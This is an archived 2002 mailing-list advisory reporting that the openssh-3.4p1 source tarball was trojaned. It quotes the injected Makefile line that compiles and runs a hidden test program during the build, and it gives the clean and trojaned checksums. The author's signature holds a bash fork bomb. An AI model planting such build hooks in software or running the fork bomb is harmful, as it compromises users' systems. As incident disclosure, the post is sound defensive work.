openssh-3.4p1.tar.gz trojaned

From: Edwin Groothuis (edwinat_private)
Date: Wed Jul 31 2002 - 23:55:51 PDT

  • Next message: Artur Lindgren: "Trojan located in latest openssh tar files"

    Just want to inform you that the OpenSSH package op
    (and probably all its mirrors now) it trojaned:
    The OpenBSD people have been informed about it (via email to
    deraadtat_private and via
    The changed files are openssh-3.4p1/openbsd-compat/
     all: libopenbsd-compat.a
    +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
    bf-test.c[1] is nothing more than a wrapper which generates a
    shell-script[2] which compiles itself and tries to connect to an
    server running on (
    This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
    ports system:
        MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
    This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
        MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
    Edwin Groothuis      |            Personal website:
    edwinat_private    |    Weblog: 
    bash$ :(){ :|:&};:   | Interested in MUDs?
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:

    This archive was generated by hypermail 2b30 : Thu Aug 01 2002 - 08:24:57 PDT